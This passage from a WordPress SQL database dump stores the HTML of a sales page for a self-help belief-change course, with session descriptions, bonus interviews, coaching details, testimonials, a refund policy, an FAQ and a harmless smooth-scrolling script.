</span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1985, 2235, '_edit_lock', '1438838446:2'),
(1986, 2235, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(1987, 2235, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(1988, 2235, '_wr_page_active_tab', '1'),
(1989, 2235, '_wr_deactivate_pb', '1'),
(1990, 2235, 'rt_custom_css', ''),
(1992, 2235, '_dp_original', '2234'),
(1993, 2236, '_edit_last', '2'),
(1994, 2236, '_wp_page_template', 'page-templates/full-width.php');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1995, 2236, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses 